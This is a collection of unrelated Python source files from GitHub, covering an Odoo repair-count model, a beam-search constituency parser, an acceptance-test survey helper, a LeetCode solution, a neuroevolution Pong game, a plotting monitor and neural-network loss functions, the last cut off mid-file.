+{"seq_id":"7101812703","text":"from collections import defaultdict\n\nfrom odoo import _, fields, models\n\n\nclass ProductProduct(models.Model):\n _inherit = \"product.product\"\n\n repair_count = fields.Float(\n compute_sudo=True,\n compute=\"_compute_repair\",\n string=\"Repairs\",\n help=\"Number of Repair Orders where the product appears as a Part\",\n )\n in_repair_ids = fields.Many2many(\n comodel_name=\"repair.order\", compute=\"_compute_repair\", store=True\n )\n\n def _compute_repair(self):\n self.repair_count = 0\n product_rma_dict = defaultdict(list)\n [\n product_rma_dict[operation.product_id.id].append(operation.repair_id.id)\n for operation in self.env[\"repair.line\"].search(\n [\n (\"company_id\", \"in\", self.env.company.ids),\n (\"product_id\", \"in\", self.ids),\n ]\n )\n ]\n for product in self:\n if not product.id:\n product.repair_count = 0.0\n continue\n product.in_repair_ids = product_rma_dict.get(product.id, [])\n product.repair_count = len(\n product.in_repair_ids.filtered(\n lambda x: x.state not in (\"draft\", \"cancel\")\n )\n )\n\n def action_product_product_in_rma_list(self):\n domain = [\n (\"id\", \"in\", self.in_repair_ids.ids),\n ]\n context = {\n \"search_default_not_draft\": 1,\n }\n\n action = {\n \"name\": _(\"Repair Orders\"),\n \"type\": \"ir.actions.act_window\",\n \"res_model\": \"repair.order\",\n \"view_type\": \"list\",\n \"view_mode\": \"list,form\",\n \"domain\": domain,\n \"context\": context,\n }\n return action\n","repo_name":"oxigensalud/odoo-addons","sub_path":"oxigen_repair/models/product_product.py","file_name":"product_product.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"5644295379","text":"#! /usr/bin/env python\nfrom SparseWeightVector import SparseWeightVector\n\n\"\"\"\nTransition based const. parser (includes tagging)\nScored with beam search and perceptron.\n\"\"\"\n\nclass ConsTree:\n\n def __init__(self,label,children=None):\n self.label = label\n self.children = [] if children is None else children\n\n def is_leaf(self):\n return self.children == []\n \n def add_child(self,child_node):\n self.children.append(child_node)\n \n def arity(self):\n return len(self.children)\n \n def get_child(self,idx=0):\n \"\"\"\n returns the ith child of this node\n \"\"\"\n return self.children[idx]\n\n def __str__(self):\n \"\"\"\n pretty prints the tree\n \"\"\"\n return self.label if self.is_leaf() else '(%s %s)'%(self.label,' '.join([str(child) for child in self.children]))\n\n def tokens(self,labels=True):\n \"\"\"\n @param labels: returns a list of strings if true else returns\n a list of ConsTree objects\n @return the list of words at the leaves of the tree\n \"\"\"\n if self.is_leaf():\n return [self.label] if labels else [self]\n else:\n result = []\n for child in self.children:\n result.extend(child.tokens(labels))\n return result\n \n def index_leaves(self):\n \"\"\"\n Adds an numeric index to each leaf node\n \"\"\"\n for idx,elt in enumerate(self.tokens(labels=False)):\n elt.idx = idx\n \n def triples(self):\n \"\"\"\n Extracts a list of evalb triples from the tree\n (supposes leaves are indexed)\n \"\"\"\n if self.is_leaf():\n return [(self.idx,self.idx+1,self.label)]\n else:\n subtriples = []\n for child in self.children:\n subtriples.extend(child.triples())\n leftidx = min([idx for idx,jdx,label in subtriples])\n rightidx = max([jdx for idx,jdx,label in subtriples])\n subtriples.append((leftidx,rightidx,self.label))\n return subtriples\n\n def compare(self,other):\n \"\"\"\n Compares this tree to another and computes precision,recall,\n fscore. 
Assumes self is the reference tree\n @param other: the predicted tree\n @return (precision,recall,fscore)\n \"\"\"\n self.index_leaves()\n other.index_leaves()\n ref_triples = set(self.triples())\n pred_triples = set(other.triples())\n intersect = ref_triples.intersection(pred_triples)\n isize = len(intersect)\n P = isize/len(pred_triples)\n R = isize/len(ref_triples)\n F = (2*P*R)/(P+R)\n return (P,R,F)\n\n \n def close_unaries(self,dummy_annotation='$'):\n \"\"\"\n In place (destructive) unary closure of unary branches\n \"\"\"\n if self.arity() == 1:\n current = self\n unary_labels = []\n while current.arity() == 1 and not current.get_child().is_leaf():\n unary_labels.append(current.label)\n current = current.get_child()\n unary_labels.append(current.label)\n self.label = dummy_annotation.join(unary_labels)\n self.children = current.children\n \n for child in self.children:\n child.close_unaries()\n\n def expand_unaries(self,dummy_annotation='$'):\n \"\"\"\n In place (destructive) expansion of unary symbols.\n \"\"\"\n if dummy_annotation in self.label:\n unary_chain = self.label.split(dummy_annotation)\n self.label = unary_chain[0]\n backup = self.children\n current = self\n for label in unary_chain[1:]:\n c = ConsTree(label)\n current.children = [c] \n current = c\n current.children = backup\n \n for child in self.children:\n child.expand_unaries()\n\n \n def left_markovize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) left markovization (order 0)\n \"\"\"\n if len(self.children) > 2:\n left_sequence = self.children[:-1]\n dummy_label = self.label if self.label[-1] == dummy_annotation else self.label+dummy_annotation\n dummy_tree = ConsTree(dummy_label, left_sequence)\n self.children = [dummy_tree,self.children[-1]]\n for child in self.children:\n child.left_markovize()\n\n def right_markovize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) right markovization (order 0)\n \"\"\"\n if len(self.children) > 2:\n right_sequence = self.children[1:]\n dummy_label = self.label if self.label[-1] == dummy_annotation else self.label+dummy_annotation\n dummy_tree = ConsTree(dummy_label, right_sequence)\n self.children = [self.children[0],dummy_tree]\n for child in self.children:\n child.right_markovize()\n\n def unbinarize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) unbinarization\n \"\"\"\n newchildren = []\n for child in self.children:\n if child.label[-1] == dummy_annotation:\n child.unbinarize()\n newchildren.extend(child.children)\n else:\n child.unbinarize()\n newchildren.append(child)\n self.children = newchildren\n\n def collect_nonterminals(self):\n \"\"\"\n Returns the list of nonterminals found in a tree:\n \"\"\"\n if not self.is_leaf():\n result = [self.label]\n for child in self.children:\n result.extend(child.collect_nonterminals())\n return result\n return []\n\n @staticmethod\n def read_tree(input_str):\n \"\"\"\n Reads a one line s-expression.\n This is a non robust function to syntax errors\n @param input_str: a s-expr string\n @return a ConsTree object\n \"\"\"\n tokens = input_str.replace('(',' ( ').replace(')',' ) ').split()\n stack = [ConsTree('dummy')]\n for idx,tok in enumerate(tokens):\n if tok == '(':\n current = ConsTree(tokens[idx+1])\n stack[-1].add_child(current)\n stack.append(current)\n elif tok == ')':\n stack.pop()\n else:\n if tokens[idx-1] != '(':\n stack[-1].add_child(ConsTree(tok))\n assert(len(stack) == 1)\n return stack[-1].get_child()\n\n\nclass ConstituentTransitionParser:\n\n SHIFT = \"S\"\n REDUCE = 
\"R\"\n STOP = \"!\"\n \n def __init__(self):\n self.model = SparseWeightVector()\n self.nonterminals = []\n\n def static_oracle(self,stack,buffer,ref_triples):\n \"\"\"\n Returns the action to do given a configuration and a ref parse tree\n @param ref_triples : the triples from the reference tree\n @param stack: the config stack\n @param buffer: a list of integers\n @return a couple (parse action, action param)\n \"\"\"\n if len(stack) >= 2:\n (i,k,X1),(k,j,X2) = stack[-2],stack[-1]\n for X in self.nonterminals:\n if (i,j,X) in ref_triples:\n return (ConstituentTransitionParser.REDUCE,X)\n if buffer:\n idx = buffer[0]\n for tag in self.nonterminals:\n if(idx,idx+1,tag) in ref_triples:\n return (ConstituentTransitionParser.SHIFT,tag)\n return (ConstituentTransitionParser.STOP,ConstituentTransitionParser.STOP)\n\n \n def reference_derivation(self,ref_tree):\n \"\"\"\n Returns a reference derivation given a reference tree\n @param ref_tree: a ConsTree\n \"\"\"\n ref_tree.index_leaves()\n ref_triples = set(ref_tree.triples())\n sentence = ref_tree.tokens()\n N = len(sentence)\n\n action = (None,None)\n c = (tuple(),tuple(range(N)),0.0)\n derivation = [(action,c)]\n \n for t in range(2*N):#because 2N-1+terminate\n S,B,score = c\n action,param = self.static_oracle(S,B,ref_triples)\n if action == ConstituentTransitionParser.REDUCE:\n c = self.reduce(c,param,sentence)\n elif action == ConstituentTransitionParser.SHIFT:\n c = self.shift(c,param,sentence)\n else:\n c = self.terminate(c,sentence)\n derivation.append(((action,param),c))\n return derivation\n\n\n def build_tree(self,derivation,sentence):\n \"\"\"\n Builds a ConsTree from a parse derivation\n @param derivation: a parse derivation\n @param sentence: a list of tokens\n @return a ConsTree\n \"\"\"\n tree_stack = [ ]\n for (action,param) , C in derivation:\n S,B,score = C \n if action == ConstituentTransitionParser.SHIFT:\n i,j,lbl = S[-1]\n tag_node = ConsTree(param)\n leaf_node = ConsTree(sentence[i])\n tag_node.add_child(leaf_node)\n tree_stack.append(tag_node)\n elif action == ConstituentTransitionParser.REDUCE:\n root_node = ConsTree(param)\n rnode = tree_stack.pop()\n lnode = tree_stack.pop()\n root_node.children = [lnode,rnode]\n tree_stack.append(root_node)\n return tree_stack[-1]\n \n def reduce(self,C,param,sentence):\n \"\"\"\n Performs a reduction from the current configuration and returns the result\n @param S: a stack\n @param B: a buffer\n @param param: the category for reduction\n @return a configuration\n \"\"\"\n S,B,score = C\n i,k,_ = S[-2]\n k,j,_ = S[-1]\n return (S[:-2]+((i,j,param),),B,score+self.score(C,(ConstituentTransitionParser.REDUCE,param),sentence))\n \n def shift(self,C,param,sentence):\n \"\"\"\n Performs a reduction from the current configuration and returns the result\n @param S: a stack\n @param B: a buffer\n @param param: the category for reduction\n @return a configuration\n \"\"\"\n S,B,score = C\n idx = S[-1][1] if S else 0\n return (S+((idx,idx+1,param),),B[1:],score+self.score(C,(ConstituentTransitionParser.SHIFT,param),sentence))\n \n def terminate(self,C,sentence):\n \"\"\"\n Performs a stop action returns the result\n \"\"\"\n S,B,score = C\n return (S,B,score+self.score(C,(ConstituentTransitionParser.STOP,ConstituentTransitionParser.STOP),sentence))\n \n\n def score(self,configuration,action,tokens):\n \"\"\"\n Computes the prefix score of a derivation\n @param configuration : a triple (S,B,score)\n @param action: an action label \n @param tokens: the x-sequence of tokens to be parsed\n 
@return a prefix score\n \"\"\"\n S,B,old_score = configuration\n config_repr = self.__make_config_representation(S,B,tokens)\n return old_score + self.model.dot(config_repr,action)\n\n def __make_config_representation(self,S,B,tokens):\n \"\"\"\n This gathers the information for coding the configuration as a feature vector.\n @param S: a configuration stack\n @param B a configuration buffer\n @return an ordered list of tuples \n \"\"\"\n #default values for inaccessible positions\n s0cat,s1cat,s0l,s0r,s1l,s1r,b0,b1,b2 = \"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\"\n \n if len(S) > 0:\n i,j,lbl = S[-1]\n s0l,s0r,s0cat = tokens[i],tokens[j-1],lbl\n if len(S) > 1:\n i,j,lbl = S[-2]\n s1l,s1r,s1cat = tokens[i],tokens[j-1],lbl\n if len(B) > 0:\n b0 = tokens[B[0]]\n if len(B) > 1:\n b1 = tokens[B[1]]\n if len(B) > 2:\n b2 = tokens[B[2]]\n\n wordlist = [s0l,s0r,s1l,s1r,b0,b1,b2]\n catlist = [s0cat,s1cat,b0]\n word_bigrams = list(zip(wordlist,wordlist[1:]))\n word_trigrams = list(zip(wordlist,wordlist[1:],wordlist[2:]))\n cat_bigrams = list(zip(catlist,catlist[1:]))\n \n return word_bigrams + word_trigrams + cat_bigrams\n\n\n def transform(self,dataset,left_markov = True):\n \"\"\"\n In place (destructive) conversion of a treebank to Chomsky Normal Form.\n Builds the list of the parser nonterminals as a side effect\n and indexes references trees.\n \n @param dataset a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n \"\"\"\n all_nonterminals = set()\n for tree in dataset:\n tree.close_unaries()\n if left_markov:\n tree.left_markovize()\n else:\n tree.right_markovize()\n all_nonterminals.update(tree.collect_nonterminals()) \n self.nonterminals = list(all_nonterminals)\n \n def parse_one(self,sentence,beam_size=4,get_beam=False,deriv=False,untransform=True):\n \"\"\"\n @param sentence: a list of strings\n @param beam_size: size of the beam\n @param get_beam : returns the beam instead of tree like structures\n @param deriv: returns the derivation instead of the parse tree\n @param untransform: bool if true unbinarizes the resulting tree.\n \"\"\"\n \n actions = [ConstituentTransitionParser.SHIFT,\\\n ConstituentTransitionParser.REDUCE,\\\n ConstituentTransitionParser.STOP]\n all_actions = list([(a,p) for a in actions for p in self.nonterminals])\n \n N = len(sentence)\n init = (tuple(),tuple(range(N)),0.0) #A config is a hashable triple with score \n current_beam = [(-1,(None,None),init)]\n beam = [current_beam]\n \n for i in range(2*N): #because 2*N-1+terminate\n next_beam = []\n for idx, ( _ ,action,config) in enumerate(current_beam):\n S,B,score = config \n for (a,p) in all_actions:\n if a == ConstituentTransitionParser.SHIFT:\n if B:\n newconfig = self.shift(config,p,sentence)\n next_beam.append((idx,(a,p),newconfig))\n elif a == ConstituentTransitionParser.REDUCE:\n if len(S) >= 2:\n newconfig = self.reduce(config,p,sentence)\n next_beam.append((idx,(a,p),newconfig))\n elif a == ConstituentTransitionParser.STOP:\n if len(S) < 2 and not B:\n newconfig = self.terminate(config,sentence)\n next_beam.append((idx,(a,a),newconfig))\n next_beam.sort(key=lambda x:x[2][2],reverse=True)\n next_beam = next_beam[:beam_size]\n beam.append(next_beam)\n current_beam = next_beam\n \n if get_beam:\n return beam\n else:\n #Backtrace for derivation\n idx = 1\n prev_jdx = 0\n derivation = []\n while prev_jdx != -1:\n current = beam[-idx][prev_jdx]\n prev_jdx,prev_action,C = current\n 
derivation.append((prev_action,C))\n idx += 1\n derivation.reverse()\n if deriv:\n return derivation\n else:\n result = self.build_tree(derivation,sentence)\n if untransform:\n result.unbinarize()\n result.expand_unaries()\n return result\n\n def early_prefix(self,ref_parse,beam):\n \"\"\"\n Finds the prefix for early update, that is the prefix where the ref parse fall off the beam.\n @param ref_parse: a parse derivation\n @param beam: a beam output by the parse_one function\n @return (bool, ref parse prefix, best in beam prefix)\n the bool is True if update required false otherwise\n \"\"\"\n idx = 0\n for (actionR,configR),(beamCol) in zip(ref_parse,beam):\n found = False\n for source_idx,action,configTarget in beamCol:\n if action == actionR and configTarget[:-1] == configR[:-1]: #-1 -> does not test score equality\n found = True\n break\n if not found:\n #backtrace\n jdx = idx\n source_idx = 0\n early_prefix = []\n while jdx >= 0:\n new_source_idx,action,config = beam[jdx][source_idx]\n early_prefix.append( (action,config))\n source_idx = new_source_idx\n jdx -= 1\n early_prefix.reverse()\n return (True, ref_parse[:idx+1],early_prefix)\n idx+=1\n #if no error found check that the best in beam is the ref parse\n last_ref_action,last_ref_config = ref_parse[-1]\n _,last_pred_action,last_pred_config = beam[-1][0]\n if last_pred_config[:-1] == last_ref_config[:-1]:\n return (False,None,None) #returns a no update message\n else:#backtrace\n jdx = len(beam)-1\n source_idx = 0\n early_prefix = []\n while jdx >= 0:\n new_source_idx,action,config = beam[jdx][source_idx]\n early_prefix.append( (action,config) )\n source_idx = new_source_idx\n jdx -= 1\n early_prefix.reverse()\n return (True,ref_parse,early_prefix)\n \n\n def test(self,treebank,beam_size=4):\n \"\"\" \n @param treebank a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n @return the avg f-score\n \"\"\"\n Fscores = []\n for tree in treebank:\n result = self. 
parse_one(tree.tokens(),beam_size)\n print(result)\n P,R,F = tree.compare(result)\n Fscores.append(F)\n return sum(Fscores)/len(Fscores)\n \n def train(self,treebank,step_size=1.0,max_epochs=100,beam_size=4,left_markov=True):\n \"\"\" \n @param treebank a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n \"\"\"\n self.transform(treebank,left_markov)\n dataset = list([(tree.tokens(),self.reference_derivation(tree)) for tree in treebank])\n N = len(dataset)\n for e in range(max_epochs):\n loss = 0.0\n for sentence,ref_derivation in dataset:\n pred_beam = (self.parse_one(sentence,get_beam=True))\n (update, ref_prefix,pred_prefix) = self.early_prefix(ref_derivation,pred_beam)\n if update:\n loss += 1.0\n delta_ref = SparseWeightVector()\n current_config = ref_prefix[0][1]\n for action,config in ref_prefix[1:]:\n S,B,score = current_config\n x_repr = self.__make_config_representation(S,B,sentence)\n delta_ref += SparseWeightVector.code_phi(x_repr,action)\n current_config = config\n \n delta_pred = SparseWeightVector()\n current_config = pred_prefix[0][1]\n for action,config in pred_prefix[1:]:\n S,B,score = current_config\n x_repr = self.__make_config_representation(S,B,sentence)\n delta_pred += SparseWeightVector.code_phi(x_repr,action)\n current_config = config\n\n self.model += step_size*(delta_ref-delta_pred)\n \n print('Loss = ',loss, \"%Exact match = \",(N-loss)/N)\n if loss == 0.0:\n return\n\n \n \nx = ConsTree.read_tree('(S (NP (D le) (N chat)) (VN (V mange)) (NP (D la) (N souris)) (PP (P sur) (NP (D le) (N paillasson))) (PONCT .))')\ny = ConsTree.read_tree('(S (NP (D la) (N souris)) (VN (V dort)) (PONCT .))')\nz = ConsTree.read_tree('(S (NP (D le) (N cuisinier)) (VN (V mange)) (NP (D une) (N salade) (PP (P avec) (NP (D des) (N cornichons)))) (PONCT .))')\n\nparser = ConstituentTransitionParser()\nparser.train([x,y,z])\n\nx = ConsTree.read_tree('(S (NP (D le) (N chat)) (VN (V mange)) (NP (D la) (N souris)) (PP (P sur) (NP (D le) (N paillasson))) (PONCT .))')\ny = ConsTree.read_tree('(S (NP (D la) (N souris)) (VN (V dort)) (PONCT .))')\nz = ConsTree.read_tree('(S (NP (D le) (N cuisinier)) (VN (V mange)) (NP (D une) (N salade) (PP (P avec) (NP (D des) (N cornichons)))) (PONCT .))')\n\n\nprint(parser.test([x,y,z]))\n","repo_name":"bencrabbe/parsing-at-diderot","sub_path":"const_transition.py","file_name":"const_transition.py","file_ext":"py","file_size_in_byte":21088,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"35485078512","text":"from datetime import datetime\nfrom functools import partial\nfrom typing import Mapping\n\nimport requests\n\nfrom acceptance_tests.utilities.pubsub_helper import get_matching_pubsub_message_acking_others\nfrom acceptance_tests.utilities.test_case_helper import test_helper\nfrom config import Config\n\n\ndef add_survey(sample_validation_rules, test_start_time, sample_definition_url=\"http://foo.bar.json\",\n sample_has_header_row=True, sample_file_separator=','):\n survey_name = 'test survey ' + datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n\n url = f'{Config.SUPPORT_TOOL_API}/surveys'\n\n body = {\"name\": survey_name,\n \"sampleValidationRules\": sample_validation_rules,\n \"sampleWithHeaderRow\": sample_has_header_row,\n \"sampleSeparator\": sample_file_separator,\n \"sampleDefinitionUrl\": sample_definition_url,\n \"metadata\": {'foo': 'bar'}}\n\n response = requests.post(url, json=body)\n response.raise_for_status()\n\n survey_id = response.json()\n\n survey_update_event = get_emitted_survey_update(survey_name, test_start_time)\n test_helper.assertEqual(survey_update_event['name'], survey_name,\n 'Unexpected survey name')\n\n test_helper.assertEqual(survey_update_event['sampleDefinitionUrl'], sample_definition_url,\n 'Unexpected sample definition URL')\n\n test_helper.assertEqual(survey_update_event['metadata'], {'foo': 'bar'},\n 'Unexpected metadata')\n\n return survey_id\n\n\ndef get_emitted_survey_update(expected_survey_name, test_start_time):\n # Build the matcher with the current expected survey name\n survey_name_matcher = partial(_survey_name_message_matcher, expected_survey_name=expected_survey_name)\n\n message_received = get_matching_pubsub_message_acking_others(Config.PUBSUB_OUTBOUND_SURVEY_SUBSCRIPTION,\n survey_name_matcher, test_start_time)\n\n return message_received['payload']['surveyUpdate']\n\n\ndef _survey_name_message_matcher(message: Mapping, expected_survey_name=None) -> (bool, str):\n if message['payload']['surveyUpdate']['name'] == expected_survey_name:\n return True, ''\n return False, f'Actual survey name \"{message[\"payload\"][\"surveyUpdate\"][\"name\"]}\" ' \\\n f'does not match expected \"{expected_survey_name}\"'\n","repo_name":"ONSdigital/ssdc-rm-acceptance-tests","sub_path":"acceptance_tests/utilities/survey_helper.py","file_name":"survey_helper.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22473868624","text":"import unittest\n\ndata = ((\"aA\", \"aAAbbbb\", 3), (\"z\", \"ZZ\", 0))\n\n\nclass Solution:\n def numJewelsInStones(self, jewels: str, stones: str) -> int:\n jewels_set = set(jewels)\n jewels_count = 0\n for s in stones:\n if s in jewels_set:\n jewels_count += 1\n return jewels_count\n\n\nclass TestCase(unittest.TestCase):\n def test_solution(self):\n s = Solution()\n\n for jewels, stones, expected in data:\n self.assertEqual(s.numJewelsInStones(jewels, stones), expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cybernextgen/leetcode","sub_path":"easy/771-jewels-and-stones.py","file_name":"771-jewels-and-stones.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28147215907","text":"import numpy.random as nprand\nimport pygame\nfrom ball import Ball\nfrom paddle import Paddle\n\nclass Pong:\n def __init__(self):\n pygame.init()\n self.font = pygame.font.SysFont('Comic Sans MS', 30)\n self.screen = pygame.display.set_mode([1820, 980])\n self.screenWidth = self.screen.get_width()\n self.screenHeight = self.screen.get_height()\n\n self.simSpeed = 3\n\n self.population = []\n self.balls = []\n self.previousPopulation = []\n self.populationSize = 256\n self.averageFitnessHistory = []\n self.maximumScoreHistory = []\n self.maximumHitsHistory = []\n\n self.createPopulation()\n self.createBalls()\n self.generation = 1\n\n self.running = True\n self.drawAll = True\n self.gameLoop()\n pass\n\n def createPopulation(self):\n for i in range(self.populationSize):\n paddle = Paddle(self.screen)\n self.population.append(paddle)\n return self.population\n\n def createBalls(self):\n for i in range(self.populationSize):\n ball = Ball(self.screen, self.simSpeed)\n self.balls.append(ball)\n return self.balls\n\n def evaluateFitness(self):\n sumScore = 0\n sumHits = 0\n for paddle in self.previousPopulation:\n sumScore += paddle.timeUnderBall\n sumHits += paddle.ballHits\n for paddle in self.previousPopulation:\n paddle.fitness = ((paddle.timeUnderBall * paddle.ballHits) + (15000 / paddle.distanceFromBall)) ** 2\n pass\n\n def calculateStatistics(self):\n totalFitness = 0\n maximumScore = 0\n maximumHits = 0\n for paddle in self.previousPopulation:\n if paddle.timeUnderBall > maximumScore:\n maximumScore = paddle.timeUnderBall\n if paddle.ballHits > maximumHits:\n maximumHits = paddle.ballHits\n totalFitness += paddle.fitness\n self.averageFitnessHistory.append(totalFitness/len(self.previousPopulation))\n self.maximumScoreHistory.append(maximumScore)\n self.maximumHitsHistory.append(maximumHits)\n pass \n\n #build the next generation\n def nextGeneration(self):\n self.evaluateFitness()\n self.calculateStatistics()\n for i in range(self.populationSize):\n parent1 = self.selectRandomBiasedParent()\n parent2 = self.selectRandomBiasedParent()\n child = self.crossover(parent1, parent2, 1)\n \n # parent1 = self.selectFittestParent()\n # child = self.crossover(parent1, parent1, 1)\n if nprand.random() < 0.75:\n child.brain.mutate(0.1)\n self.population.append(child)\n self.createBalls()\n print(\"Average Fitness: \", self.averageFitnessHistory[-5:])\n print(\"Maximum Score: \", self.maximumScoreHistory[-5:])\n print(\"Maximum Hits: \", self.maximumHitsHistory[-5:])\n\n\n def selectRandomBiasedParent(self, k=3):\n\t# first random selection\n index = nprand.randint(len(self.previousPopulation))\n for i in nprand.randint(0, len(self.previousPopulation), k-1):\n # check if better (e.g. 
perform a tournament)\n if self.previousPopulation[i].fitness > self.previousPopulation[index].fitness:\n index = i\n return self.previousPopulation[index]\n\n def selectFittestParent(self):\n maxFitness = 0\n fittestPaddle = self.previousPopulation[0]\n for paddle in self.previousPopulation:\n if paddle.fitness > maxFitness:\n maxFitness = paddle.fitness\n fittestPaddle = paddle\n return fittestPaddle\n\n def crossover(self, parent1, parent2, crossoverRate):\n child = Paddle(self.screen)\n for layer in range(len(child.brain.layers)):\n for row in range(len(child.brain.layers[layer].weights)):\n for weight in range(len(child.brain.layers[layer].weights[row])):\n if nprand.random() < crossoverRate:\n child.brain.layers[layer].weights[row][weight] = parent1.brain.layers[layer].weights[row][weight]\n else:\n child.brain.layers[layer].weights[row][weight] = parent2.brain.layers[layer].weights[row][weight]\n return child\n\n def update(self):\n if len(self.population) <= 0:\n self.nextGeneration()\n self.generation += 1\n self.previousPopulation = []\n print(\"Generation: \", self.generation)\n else:\n toRemove = []\n for i in range(len(self.population)):\n paddle = self.population[i]\n ball = self.balls[i]\n if not ball.checkBallPos():\n self.previousPopulation.append(paddle)\n paddle.distanceFromBall = abs(ball.xPos - paddle.pos)\n toRemove.append(i)\n ball.updatePosition()\n paddle.collisionCheck(ball)\n prediction = paddle.think([[paddle.pos / self.screenWidth],[ball.xPos / self.screenWidth],[ball.yPos / self.screenHeight], [ball.xVel], [ball.yVel]])\n if prediction == 0:\n paddle.move(1)\n elif prediction == 2:\n paddle.move(-1)\n pass\n self.population = [paddle for paddle in self.population if self.population.index(paddle) not in toRemove]\n self.balls = [ball for ball in self.balls if self.balls.index(ball) not in toRemove]\n \n\n def draw(self):\n self.screen.fill((255,255,255))\n if (self.drawAll):\n for i in range(len(self.population)):\n self.population[i].draw()\n self.balls[i].draw()\n else:\n self.population[-1].draw()\n self.balls[-1].draw()\n pass\n\n def gameLoop(self):\n while self.running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_2:\n self.simSpeed = 5 if self.simSpeed >= 4.5 else self.simSpeed + 0.5\n print(self.simSpeed)\n for paddle in self.population:\n paddle.speed = self.simSpeed\n for ball in self.balls:\n ball.speed = self.simSpeed\n pass\n if event.key == pygame.K_1:\n self.simSpeed = 0 if self.simSpeed <= 0.5 else self.simSpeed - 0.5\n print(self.simSpeed)\n for paddle in self.population:\n paddle.speed = self.simSpeed\n for ball in self.balls:\n ball.speed = self.simSpeed\n if event.key == pygame.K_r:\n for ball in self.balls:\n self.balls = []\n for paddle in self.population:\n paddle.distanceFromBall = 500\n self.previousPopulation.append(paddle)\n self.population = []\n\n self.update()\n if (len(self.population) > 0):\n if (self.generation % 1 == 0):\n self.draw()\n pygame.display.flip()\n \n\n\ngame = Pong()","repo_name":"frankpeckover/pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":7582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34969470073","text":"import mubeaSlipSimulator as ms\nfrom datetime import datetime\nimport os\nimport plotext as plt\n\n\ndef monitorRuns(runs: int, d: ms.MeasurementStore, refresh_ms: int):\n labels = []\n velocities_f = []\n velocities_r = []\n delta = []\n\n values = d.getLast(runs)\n for v in values:\n id, data = v\n labels.append(datetime.strptime(data.get('date'), \"%Y-%m-%d %H:%M:%S.%f\"))\n velocities_f.append(float(data.get('velocity_f')))\n velocities_r.append(float(data.get('velocity_r')))\n\n d = float(data.get('velocity_f')) - float(data.get('velocity_r'))\n delta.append(d)\n\n title = 'Last Runs'\n os.system('cls' if os.name == 'nt' else 'clear')\n plt.clt()\n plt.clf()\n\n dates = plt.datetimes_to_string(labels)\n\n # Set the color of each line based on the velocity_f and velocity_r values\n line_color = \"red\" if velocities_f[-1] < velocities_r[-1] else \"blue\"\n plt.plot(delta, label=\"delta\", yside=\"right\", fillx=True, color=\"gray\")\n plt.plot(velocities_f, label=\"f\", yside=\"left\", color=line_color)\n plt.plot(velocities_r, label=\"r\", yside=\"left\", color=line_color)\n\n plt.interactive(True)\n plt.show()\n\n time.sleep(refresh_ms/1000)\n","repo_name":"Keijukainen311/SlipDetection","sub_path":"monitorTerminal.py","file_name":"monitorTerminal.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73521211529","text":"try:\r\n import cupy as np\r\n is_cupy_available = True\r\nexcept:\r\n import numpy as np\r\n is_cupy_available = False\r\n\r\nfrom diffusion.activations import Sigmoid, Softmax, ReLU, LogSoftmax\r\n\r\n\r\nclass MSE():\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.power(t - y, 2)\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -2 * (t - y) / np.prod(np.asarray(y.shape[1:]))\r\n\r\n\r\nclass BinaryCrossEntropy():\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -(t * np.log(y + 1e-8) + (1 - t) * np.log(1 - y + 1e-8))\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -t / (y + 1e-8) + (1 - t) / (1 - (y + 1e-8))\r\n\r\n\r\nclass CategoricalCrossEntropy():\r\n def __init__(self, ignore_index = None) -> None:\r\n self.ignore_index = ignore_index\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.where(t == self.ignore_index, 0, - t * np.log(y))\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.where(t == self.ignore_index, 0, -t / y)\r\n\r\n\r\nclass CrossEntropy():\r\n def __init__(self, ignore_index = None) -> None:\r\n self.ignore_index = ignore_index\r\n self.log_softmax = LogSoftmax()\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n log_softmax = self.log_softmax.forward(y)\r\n nll_loss = -log_softmax[np.arange(len(t)), t]\r\n \r\n return np.where(t == self.ignore_index, 0, nll_loss)\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n batch_size = y.shape[0]\r\n err = 1/batch_size\r\n nll_loss_der = -1 * np.where(np.isin(y, y[np.arange(len(t)), t]), err, 0).astype(y.dtype)\r\n \r\n output_err = self.log_softmax.jacobian_backward(nll_loss_der)\r\n \r\n return np.where(t.reshape(-1, 1) == self.ignore_index, 0, output_err)\r\n\r\n\r\n\r\n\r\n\r\n\r\nloss_functions = {\r\n \r\n \"mse\": MSE(),\r\n \"binary_crossentropy\": 